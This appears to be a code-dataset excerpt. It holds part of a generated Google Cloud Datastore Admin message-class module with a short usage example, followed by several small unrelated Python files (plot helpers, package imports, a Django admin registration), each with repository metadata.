      operation was created. May also include additional labels.

  Fields:
    endTime: The time the operation ended, either successfully or otherwise.
    labels: The client-assigned labels which were provided when the operation
      was created. May also include additional labels.
    operationType: The type of the operation. Can be used as a filter in
      ListOperationsRequest.
    startTime: The time that work began on the operation.
    state: The current state of the Operation.
  """

  class OperationTypeValueValuesEnum(_messages.Enum):
    r"""The type of the operation. Can be used as a filter in
    ListOperationsRequest.

    Values:
      OPERATION_TYPE_UNSPECIFIED: Unspecified.
      EXPORT_ENTITIES: ExportEntities.
      IMPORT_ENTITIES: ImportEntities.
    """
    OPERATION_TYPE_UNSPECIFIED = 0
    EXPORT_ENTITIES = 1
    IMPORT_ENTITIES = 2

  class StateValueValuesEnum(_messages.Enum):
    r"""The current state of the Operation.

    Values:
      STATE_UNSPECIFIED: Unspecified.
      INITIALIZING: Request is being prepared for processing.
      PROCESSING: Request is actively being processed.
      CANCELLING: Request is in the process of being cancelled after user
        called google.longrunning.Operations.CancelOperation on the operation.
      FINALIZING: Request has been processed and is in its finalization stage.
      SUCCESSFUL: Request has completed successfully.
      FAILED: Request has finished being processed, but encountered an error.
      CANCELLED: Request has finished being cancelled after user called
        google.longrunning.Operations.CancelOperation.
    """
    STATE_UNSPECIFIED = 0
    INITIALIZING = 1
    PROCESSING = 2
    CANCELLING = 3
    FINALIZING = 4
    SUCCESSFUL = 5
    FAILED = 6
    CANCELLED = 7

  @encoding.MapUnrecognizedFields('additionalProperties')
  class LabelsValue(_messages.Message):
    r"""The client-assigned labels which were provided when the operation was
    created. May also include additional labels.

    Messages:
      AdditionalProperty: An additional property for a LabelsValue object.

    Fields:
      additionalProperties: Additional properties of type LabelsValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a LabelsValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  endTime = _messages.StringField(1)
  labels = _messages.MessageField('LabelsValue', 2)
  operationType = _messages.EnumField('OperationTypeValueValuesEnum', 3)
  startTime = _messages.StringField(4)
  state = _messages.EnumField('StateValueValuesEnum', 5)


class GoogleDatastoreAdminV1beta1EntityFilter(_messages.Message):
  r"""Identifies a subset of entities in a project. This is specified as
  combinations of kinds and namespaces (either or both of which may be all, as
  described in the following examples). Example usage: Entire project:
  kinds=[], namespace_ids=[] Kinds Foo and Bar in all namespaces:
  kinds=['Foo', 'Bar'], namespace_ids=[] Kinds Foo and Bar only in the
  default namespace: kinds=['Foo', 'Bar'], namespace_ids=[''] Kinds Foo and
  Bar in both the default and Baz namespaces: kinds=['Foo', 'Bar'],
  namespace_ids=['', 'Baz'] The entire Baz namespace: kinds=[],
  namespace_ids=['Baz']

  Fields:
    kinds: If empty, then this represents all kinds.
    namespaceIds: An empty list represents all namespaces. This is the
      preferred usage for projects that don't use namespaces. An empty string
      element represents the default namespace. This should be used if the
      project has data in non-default namespaces, but doesn't want to include
      them. Each namespace in this list must be unique.
  """

  kinds = _messages.StringField(1, repeated=True)
  namespaceIds = _messages.StringField(2, repeated=True)


class GoogleDatastoreAdminV1beta1ExportEntitiesMetadata(_messages.Message):
  r"""Metadata for ExportEntities operations.

  Fields:
    common: Metadata common to all Datastore Admin operations.
    entityFilter: Description of which entities are being exported.
    outputUrlPrefix: Location for the export metadata and data files. This
      will be the same value as the
      google.datastore.admin.v1beta1.ExportEntitiesRequest.output_url_prefix
      field. The final output location is provided in
      google.datastore.admin.v1beta1.ExportEntitiesResponse.output_url.
    progressBytes: An estimate of the number of bytes processed.
    progressEntities: An estimate of the number of entities processed.
  """

  common = _messages.MessageField('GoogleDatastoreAdminV1beta1CommonMetadata', 1)
  entityFilter = _messages.MessageField('GoogleDatastoreAdminV1beta1EntityFilter', 2)
  outputUrlPrefix = _messages.StringField(3)
  progressBytes = _messages.MessageField('GoogleDatastoreAdminV1beta1Progress', 4)
  progressEntities = _messages.MessageField('GoogleDatastoreAdminV1beta1Progress', 5)


class GoogleDatastoreAdminV1beta1ExportEntitiesRequest(_messages.Message):
  r"""The request for
  google.datastore.admin.v1beta1.DatastoreAdmin.ExportEntities.

  Messages:
    LabelsValue: Client-assigned labels.

  Fields:
    entityFilter: Description of what data from the project is included in the
      export.
    labels: Client-assigned labels.
    outputUrlPrefix: Location for the export metadata and data files. The
      full resource URL of the external storage location. Currently, only
      Google Cloud Storage is supported. So output_url_prefix should be of the
      form: `gs://BUCKET_NAME[/NAMESPACE_PATH]`, where `BUCKET_NAME` is the
      name of the Cloud Storage bucket and `NAMESPACE_PATH` is an optional
      Cloud Storage namespace path (this is not a Cloud Datastore namespace).
      For more information about Cloud Storage namespace paths, see [Object
      name considerations](https://cloud.google.com/storage/docs/naming
      #object-considerations). The resulting files will be nested deeper than
      the specified URL prefix. The final output URL will be provided in the
      google.datastore.admin.v1beta1.ExportEntitiesResponse.output_url field.
      That value should be used for subsequent ImportEntities operations. By
      nesting the data files deeper, the same Cloud Storage bucket can be used
      in multiple ExportEntities operations without conflict.
  """

  @encoding.MapUnrecognizedFields('additionalProperties')
  class LabelsValue(_messages.Message):
    r"""Client-assigned labels.

    Messages:
      AdditionalProperty: An additional property for a LabelsValue object.

    Fields:
      additionalProperties: Additional properties of type LabelsValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a LabelsValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  entityFilter = _messages.MessageField('GoogleDatastoreAdminV1beta1EntityFilter', 1)
  labels = _messages.MessageField('LabelsValue', 2)
  outputUrlPrefix = _messages.StringField(3)


class GoogleDatastoreAdminV1beta1ExportEntitiesResponse(_messages.Message):
  r"""The response for
  google.datastore.admin.v1beta1.DatastoreAdmin.ExportEntities.

  Fields:
    outputUrl: Location of the output metadata file. This can be used to begin
      an import into Cloud Datastore (this project or another project). See
      google.datastore.admin.v1beta1.ImportEntitiesRequest.input_url. Only
      present if the operation completed successfully.
  """

  outputUrl = _messages.StringField(1)


class GoogleDatastoreAdminV1beta1ImportEntitiesMetadata(_messages.Message):
  r"""Metadata for ImportEntities operations.

  Fields:
    common: Metadata common to all Datastore Admin operations.
    entityFilter: Description of which entities are being imported.
    inputUrl: The location of the import metadata file. This will be the same
      value as the
      google.datastore.admin.v1beta1.ExportEntitiesResponse.output_url field.
    progressBytes: An estimate of the number of bytes processed.
    progressEntities: An estimate of the number of entities processed.
  """

  common = _messages.MessageField('GoogleDatastoreAdminV1beta1CommonMetadata', 1)
  entityFilter = _messages.MessageField('GoogleDatastoreAdminV1beta1EntityFilter', 2)
  inputUrl = _messages.StringField(3)
  progressBytes = _messages.MessageField('GoogleDatastoreAdminV1beta1Progress', 4)
  progressEntities = _messages.MessageField('GoogleDatastoreAdminV1beta1Progress', 5)


class GoogleDatastoreAdminV1beta1ImportEntitiesRequest(_messages.Message):
  r"""The request for
  google.datastore.admin.v1beta1.DatastoreAdmin.ImportEntities.

  Messages:
    LabelsValue: Client-assigned labels.

  Fields:
    entityFilter: Optionally specify which kinds/namespaces are to be
      imported. If provided, the list must be a subset of the EntityFilter
      used in creating the export, otherwise a FAILED_PRECONDITION error will
      be returned. If no filter is specified then all entities from the export
      are imported.
    inputUrl: The full resource URL of the external storage location.
      Currently, only Google Cloud Storage is supported. So input_url should
      be of the form:
      `gs://BUCKET_NAME[/NAMESPACE_PATH]/OVERALL_EXPORT_METADATA_FILE`, where
      `BUCKET_NAME` is the name of the Cloud Storage bucket, `NAMESPACE_PATH`
      is an optional Cloud Storage namespace path (this is not a Cloud
      Datastore namespace), and `OVERALL_EXPORT_METADATA_FILE` is the metadata
      file written by the ExportEntities operation. For more information about
      Cloud Storage namespace paths, see [Object name
      considerations](https://cloud.google.com/storage/docs/naming#object-
      considerations). For more information, see
      google.datastore.admin.v1beta1.ExportEntitiesResponse.output_url.
    labels: Client-assigned labels.
  """

  @encoding.MapUnrecognizedFields('additionalProperties')
  class LabelsValue(_messages.Message):
    r"""Client-assigned labels.

    Messages:
      AdditionalProperty: An additional property for a LabelsValue object.

    Fields:
      additionalProperties: Additional properties of type LabelsValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a LabelsValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  entityFilter = _messages.MessageField('GoogleDatastoreAdminV1beta1EntityFilter', 1)
  inputUrl = _messages.StringField(2)
  labels = _messages.MessageField('LabelsValue', 3)


class GoogleDatastoreAdminV1beta1Progress(_messages.Message):
  r"""Measures the progress of a particular metric.

  Fields:
    workCompleted: The amount of work that has been completed. Note that this
      may be greater than work_estimated.
    workEstimated: An estimate of how much work needs to be performed. May be
      zero if the work estimate is unavailable.
  """

  workCompleted = _messages.IntegerField(1)
  workEstimated = _messages.IntegerField(2)


class GoogleLongrunningOperation(_messages.Message):
  r"""This resource represents a long-running operation that is the result of
  a network API call.

  Messages:
    MetadataValue: Service-specific metadata associated with the operation.
      It typically contains progress information and common metadata such as
      create time. Some services might not provide such metadata. Any method
      that returns a long-running operation should document the metadata type,
      if any.
    ResponseValue: The normal response of the operation in case of success.
      If the original method returns no data on success, such as `Delete`, the
      response is `google.protobuf.Empty`. If the original method is standard
      `Get`/`Create`/`Update`, the response should be the resource. For other
      methods, the response should have the type `XxxResponse`, where `Xxx` is
      the original method name. For example, if the original method name is
      `TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.

  Fields:
    done: If the value is `false`, it means the operation is still in
      progress. If `true`, the operation is completed, and either `error` or
      `response` is available.
    error: The error result of the operation in case of failure or
      cancellation.
    metadata: Service-specific metadata associated with the operation. It
      typically contains progress information and common metadata such as
      create time. Some services might not provide such metadata. Any method
      that returns a long-running operation should document the metadata type,
      if any.
    name: The server-assigned name, which is only unique within the same
      service that originally returns it. If you use the default HTTP mapping,
      the `name` should be a resource name ending with
      `operations/{unique_id}`.
    response: The normal response of the operation in case of success. If the
      original method returns no data on success, such as `Delete`, the
      response is `google.protobuf.Empty`. If the original method is standard
      `Get`/`Create`/`Update`, the response should be the resource. For other
      methods, the response should have the type `XxxResponse`, where `Xxx` is
      the original method name. For example, if the original method name is
      `TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.
  """

  @encoding.MapUnrecognizedFields('additionalProperties')
  class MetadataValue(_messages.Message):
    r"""Service-specific metadata associated with the operation. It typically
    contains progress information and common metadata such as create time.
    Some services might not provide such metadata. Any method that returns a
    long-running operation should document the metadata type, if any.

    Messages:
      AdditionalProperty: An additional property for a MetadataValue object.

    Fields:
      additionalProperties: Properties of the object. Contains field @type
        with type URL.
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a MetadataValue object.

      Fields:
        key: Name of the additional property.
        value: A extra_types.JsonValue attribute.
      """

      key = _messages.StringField(1)
      value = _messages.MessageField('extra_types.JsonValue', 2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  @encoding.MapUnrecognizedFields('additionalProperties')
  class ResponseValue(_messages.Message):
    r"""The normal response of the operation in case of success. If the
    original method returns no data on success, such as `Delete`, the response
    is `google.protobuf.Empty`. If the original method is standard
    `Get`/`Create`/`Update`, the response should be the resource. For other
    methods, the response should have the type `XxxResponse`, where `Xxx` is
    the original method name. For example, if the original method name is
    `TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.

    Messages:
      AdditionalProperty: An additional property for a ResponseValue object.

    Fields:
      additionalProperties: Properties of the object. Contains field @type
        with type URL.
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a ResponseValue object.

      Fields:
        key: Name of the additional property.
        value: A extra_types.JsonValue attribute.
      """

      key = _messages.StringField(1)
      value = _messages.MessageField('extra_types.JsonValue', 2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  done = _messages.BooleanField(1)
  error = _messages.MessageField('Status', 2)
  metadata = _messages.MessageField('MetadataValue', 3)
  name = _messages.StringField(4)
  response = _messages.MessageField('ResponseValue', 5)


class StandardQueryParameters(_messages.Message):
  r"""Query parameters accepted by all methods.

  Enums:
    FXgafvValueValuesEnum: V1 error format.
    AltValueValuesEnum: Data format for response.

  Fields:
    f__xgafv: V1 error format.
    access_token: OAuth access token.
    alt: Data format for response.
    callback: JSONP
    fields: Selector specifying which fields to include in a partial response.
    key: API key. Your API key identifies your project and provides you with
      API access, quota, and reports. Required unless you provide an OAuth 2.0
      token.
    oauth_token: OAuth 2.0 token for the current user.
    prettyPrint: Returns response with indentations and line breaks.
    quotaUser: Available to use for quota purposes for server-side
      applications. Can be any arbitrary string assigned to a user, but should
      not exceed 40 characters.
    trace: A tracing token of the form "token:<tokenid>" to include in api
      requests.
    uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
    upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
  """

  class AltValueValuesEnum(_messages.Enum):
    r"""Data format for response.

    Values:
      json: Responses with Content-Type of application/json
      media: Media download with context-dependent Content-Type
      proto: Responses with Content-Type of application/x-protobuf
    """
    json = 0
    media = 1
    proto = 2

  class FXgafvValueValuesEnum(_messages.Enum):
    r"""V1 error format.

    Values:
      _1: v1 error format
      _2: v2 error format
    """
    _1 = 0
    _2 = 1

  f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
  access_token = _messages.StringField(2)
  alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json')
  callback = _messages.StringField(4)
  fields = _messages.StringField(5)
  key = _messages.StringField(6)
  oauth_token = _messages.StringField(7)
  prettyPrint = _messages.BooleanField(8, default=True)
  quotaUser = _messages.StringField(9)
  trace = _messages.StringField(10)
  uploadType = _messages.StringField(11)
  upload_protocol = _messages.StringField(12)


class Status(_messages.Message):
  r"""The `Status` type defines a logical error model that is suitable for
  different programming environments, including REST APIs and RPC APIs. It is
  used by [gRPC](https://github.com/grpc). Each `Status` message contains
  three pieces of data: error code, error message, and error details. You can
  find out more about this error model and how to work with it in the [API
  Design Guide](https://cloud.google.com/apis/design/errors).

  Messages:
    DetailsValueListEntry: A DetailsValueListEntry object.

  Fields:
    code: The status code, which should be an enum value of google.rpc.Code.
    details: A list of messages that carry the error details. There is a
      common set of message types for APIs to use.
    message: A developer-facing error message, which should be in English. Any
      user-facing error message should be localized and sent in the
      google.rpc.Status.details field, or localized by the client.
  """

  @encoding.MapUnrecognizedFields('additionalProperties')
  class DetailsValueListEntry(_messages.Message):
    r"""A DetailsValueListEntry object.

    Messages:
      AdditionalProperty: An additional property for a DetailsValueListEntry
        object.

    Fields:
      additionalProperties: Properties of the object. Contains field @type
        with type URL.
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a DetailsValueListEntry object.

      Fields:
        key: Name of the additional property.
        value: A extra_types.JsonValue attribute.
      """

      key = _messages.StringField(1)
      value = _messages.MessageField('extra_types.JsonValue', 2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  code = _messages.IntegerField(1, variant=_messages.Variant.INT32)
  details = _messages.MessageField('DetailsValueListEntry', 2, repeated=True)
  message = _messages.StringField(3)


encoding.AddCustomJsonFieldMapping(
    StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
    StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
    StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
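

# --- Editor's addition: a hedged construction example for the messages above.
# It only uses classes defined in this module plus apitools' own encoding
# helpers; the project ID, bucket name, and kind names are illustrative.
if __name__ == '__main__':
  _filter = GoogleDatastoreAdminV1beta1EntityFilter(
      kinds=['Foo', 'Bar'], namespaceIds=[''])
  _request = DatastoreProjectsExportRequest(
      projectId='my-project',
      googleDatastoreAdminV1beta1ExportEntitiesRequest=(
          GoogleDatastoreAdminV1beta1ExportEntitiesRequest(
              entityFilter=_filter,
              outputUrlPrefix='gs://my-bucket/exports')))
  # Round-trip through JSON to show the wire representation of the message.
  print(encoding.MessageToJson(_request))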
| 40.025873 | 130 | 0.748416 | 3,562 | 30,940 | 6.436833 | 0.13251 | 0.010249 | 0.023726 | 0.014044 | 0.736043 | 0.730809 | 0.722872 | 0.710659 | 0.697313 | 0.687674 | 0 | 0.009556 | 0.184874 | 30,940 | 772 | 131 | 40.07772 | 0.899564 | 0.648643 | 0 | 0.518182 | 1 | 0 | 0.146288 | 0.100776 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.559091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
5df02750eeb9c3ab14ff05b51de938db35e89f08 | 129 | py | Python | myconst/cmdlist.py | kimi0230/gogopowerkimibot | 5aa8e725a7d50020b28086cb9e8e06a5d2ebaf9d | [
"MIT"
] | 4 | 2021-06-26T13:15:43.000Z | 2021-12-16T03:39:58.000Z | myconst/cmdlist.py | kimi0230/gogopowerkimibot | 5aa8e725a7d50020b28086cb9e8e06a5d2ebaf9d | [
"MIT"
] | 1 | 2021-09-23T01:29:46.000Z | 2021-09-23T01:29:46.000Z | myconst/cmdlist.py | kimi0230/gogopowerkimibot | 5aa8e725a7d50020b28086cb9e8e06a5d2ebaf9d | [
"MIT"
] | null | null | null | CMD_LIST = "卡比請客\n笑鼠人\n吱吱\n蔡章章戶頭\n發票 {數字N: 代表前N期}\n疫情\n匯率 {幣別}\nt:{英文單字}`: 取得翻譯 音標 詞性\n天文\n天文月\n樂透\n三大\n外資{數字N: 代表前N名}\nevent\n"
| 64.5 | 128 | 0.689922 | 26 | 129 | 3.384615 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077519 | 129 | 1 | 129 | 129 | 0.739496 | 0 | 0 | 0 | 0 | 1 | 0.891473 | 0.403101 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f8ea49ff31b0f2dcf535fd1ed8d595aa10afdb24 | 71 | py | Python | cvstudio/view/widgets/gallery/__init__.py | haruiz/PytorchCvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 32 | 2019-10-31T03:10:52.000Z | 2020-12-23T11:50:53.000Z | cvstudio/view/widgets/gallery/__init__.py | haruiz/CvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 19 | 2019-10-31T15:06:05.000Z | 2020-06-15T02:21:55.000Z | cvstudio/view/widgets/gallery/__init__.py | haruiz/PytorchCvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 8 | 2019-10-31T03:32:50.000Z | 2020-07-17T20:47:37.000Z | from .gallery import Gallery
from .gallery_action import GalleryAction
| 23.666667 | 41 | 0.859155 | 9 | 71 | 6.666667 | 0.555556 | 0.366667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112676 | 71 | 2 | 42 | 35.5 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5d62aa42fdd117a5049536e14481b008871a1fc3 | 101 | py | Python | jpstat/estatFile/__init__.py | Alalalalaki/estat | 9670fe024b6ac484e863e93d970c445ce090a1df | [
"MIT"
] | 3 | 2021-01-03T21:46:08.000Z | 2021-09-13T03:03:46.000Z | jpstat/estatFile/__init__.py | Alalalalaki/estat | 9670fe024b6ac484e863e93d970c445ce090a1df | [
"MIT"
] | 1 | 2022-02-07T15:20:05.000Z | 2022-02-07T18:59:39.000Z | jpstat/estatFile/__init__.py | Alalalalaki/estat | 9670fe024b6ac484e863e93d970c445ce090a1df | [
"MIT"
] | null | null | null | from .core import get_stat, get_list, get_file
__all__ = [
"get_stat", "get_list", "get_file"
]
| 16.833333 | 46 | 0.683168 | 16 | 101 | 3.6875 | 0.5 | 0.237288 | 0.338983 | 0.474576 | 0.711864 | 0.711864 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178218 | 101 | 5 | 47 | 20.2 | 0.710843 | 0 | 0 | 0 | 0 | 0 | 0.237624 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5383d8de0836d08f541526e3191729385686a7b5 | 1,864 | py | Python | utils.py | NogaBar/mr_robust_optim | ca949e34fc7a60aa0ed3c8b990edbe24175282f4 | [
"MIT"
] | null | null | null | utils.py | NogaBar/mr_robust_optim | ca949e34fc7a60aa0ed3c8b990edbe24175282f4 | [
"MIT"
] | null | null | null | utils.py | NogaBar/mr_robust_optim | ca949e34fc7a60aa0ed3c8b990edbe24175282f4 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import torch


def plot_weight_graph(epochs, loss_lists, labels, name=''):
    epochs_array = np.arange(epochs)
    ax = plt.axes(xlabel='epoch', ylabel='weight', xticks=np.arange(0, epochs, 10),
                  yticks=np.arange(0, 10.0, 0.1))
    ax.set_title(name)
    y_min = float('inf')
    for loss_list, label in zip(loss_lists, labels):
        plt.plot(epochs_array, loss_list, label=label)
        min_loss = min(loss_list).cpu() if torch.is_tensor(min(loss_list)) else min(loss_list)
        y_min = min(y_min, min_loss)
    ax.legend()
    plt.grid(True, axis='y')
    plt.ylim(bottom=y_min - 0.1, top=1.)
    plt.savefig('./images/%s.png' % name)
    plt.clf()
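

# --- Editor's demo (assumptions: matplotlib is installed and an ./images
# directory, created below, is writable). A synthetic smoke test for
# plot_weight_graph; the values stay inside the function's fixed y-limits.
if __name__ == "__main__":
    import os
    os.makedirs("./images", exist_ok=True)
    demo_epochs = 20
    runs = [list(np.linspace(0.9, 0.2, demo_epochs)),
            list(np.linspace(0.8, 0.3, demo_epochs))]
    plot_weight_graph(demo_epochs, runs, ["run-a", "run-b"], name="demo_weights")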
def plot_accuracy_graph(epochs, loss_lists, labels, name=''):
    epochs_array = np.arange(epochs)
    ax = plt.axes(xlabel='epoch', ylabel='accuracy', xticks=np.arange(0, epochs, 10),
                  yticks=np.arange(0, 10.0, 0.1))
    ax.set_title(name)
    y_min = float('inf')
    for loss_list, label in zip(loss_lists, labels):
        plt.plot(epochs_array, loss_list, label=label)
        y_min = min(y_min, min(loss_list))
    ax.legend()
    plt.grid(True, axis='y')
    plt.ylim(bottom=y_min - 0.1, top=1.0)
    plt.savefig('./images/%s.png' % name)
    plt.clf()


def plot_loss_graph(epochs, loss_lists, labels, name=''):
    epochs_array = np.arange(epochs)
    ax = plt.axes(xlabel='epoch', ylabel='loss', xticks=np.arange(0, epochs, 10),
                  yticks=np.arange(0, 10.0, 0.1))
    ax.set_title(name)
    y_min = float('inf')
    for loss_list, label in zip(loss_lists, labels):
        plt.plot(epochs_array, loss_list, label=label)
        y_min = min(y_min, min(loss_list))
    ax.legend()
    plt.grid(True, axis='y')
    plt.ylim(bottom=y_min - 0.1, top=4.0)
    plt.savefig('./images/%s.png' % name)
    plt.clf()
| 35.846154 | 94 | 0.633047 | 305 | 1,864 | 3.714754 | 0.193443 | 0.042365 | 0.079435 | 0.052957 | 0.859665 | 0.859665 | 0.859665 | 0.843778 | 0.843778 | 0.815534 | 0 | 0.025572 | 0.20279 | 1,864 | 52 | 95 | 35.846154 | 0.736878 | 0 | 0 | 0.695652 | 0 | 0 | 0.048257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0 | 0.065217 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6
53df2f43dc934a0c042c601213f890868c3bf949 | 45 | py | Python | build/lib/spontit/__init__.py | spontit/spontit-api-python-wrapper | aefaea168a1d41055733ecb798d8c7fce19dad1b | [
"MIT"
] | 22 | 2020-05-16T08:14:46.000Z | 2021-12-26T11:05:09.000Z | spontit/__init__.py | spontit/spontit-api-python-wrapper | aefaea168a1d41055733ecb798d8c7fce19dad1b | [
"MIT"
] | 8 | 2020-06-11T12:18:03.000Z | 2020-12-18T16:18:07.000Z | build/lib/spontit/__init__.py | joshwolff1/spontit_api | aefaea168a1d41055733ecb798d8c7fce19dad1b | [
"MIT"
] | 2 | 2020-08-24T08:00:49.000Z | 2021-08-21T10:53:36.000Z | from spontit.resource import SpontitResource
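
# --- Editor's note: hedged usage sketch based on the Spontit wrapper's
# published README; the credential values are placeholders.
#
#     resource = SpontitResource('my_username', 'my_secret_key')
#     response = resource.push('Hello from the Spontit API wrapper!')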
| 22.5 | 44 | 0.888889 | 5 | 45 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.97561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
53ed74035f84d7a525137481fc605d382a833b95 | 123 | py | Python | tests/test_root.py | jaraco/jaraco.windows | e858172b4d5ee91233a8cc5319de99f17848f090 | [
"MIT"
] | 21 | 2016-01-31T00:58:59.000Z | 2021-05-06T22:30:56.000Z | tests/test_root.py | jaraco/jaraco.windows | e858172b4d5ee91233a8cc5319de99f17848f090 | [
"MIT"
] | 14 | 2016-07-21T12:02:08.000Z | 2021-08-06T03:07:54.000Z | tests/test_root.py | jaraco/jaraco.windows | e858172b4d5ee91233a8cc5319de99f17848f090 | [
"MIT"
] | 5 | 2016-06-14T04:57:04.000Z | 2021-05-06T22:30:57.000Z | def test_namespace():
    """
    A trivially simple test that will run on all platforms.
    """
    __import__('jaraco')
| 20.5 | 59 | 0.634146 | 15 | 123 | 4.866667 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252033 | 123 | 5 | 60 | 24.6 | 0.793478 | 0.447154 | 0 | 0 | 0 | 0 | 0.115385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9907a7375f0aba70297b02cee91f0fd5b2032f79 | 155 | py | Python | author/admin.py | mentix02/medialist-backend | 397b1a382b12bab273360dadb0b3c32de43747cd | [
"MIT"
] | 1 | 2019-11-22T19:29:39.000Z | 2019-11-22T19:29:39.000Z | author/admin.py | mentix02/medialist-backend | 397b1a382b12bab273360dadb0b3c32de43747cd | [
"MIT"
] | 1 | 2019-11-25T09:50:07.000Z | 2021-07-15T07:05:28.000Z | author/admin.py | mentix02/medialist-backend | 397b1a382b12bab273360dadb0b3c32de43747cd | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin

from author.models import Author

admin.site.register(Author, UserAdmin)
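
# --- Editor's note: a hedged extension sketch. If Author ever grows custom
# fields (`bio` below is hypothetical), a thin UserAdmin subclass keeps the
# built-in auth admin behaviour while surfacing the extra field:
#
#     class AuthorAdmin(UserAdmin):
#         fieldsets = UserAdmin.fieldsets + (('Profile', {'fields': ('bio',)}),)
#
#     admin.site.register(Author, AuthorAdmin)  # instead of the line above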
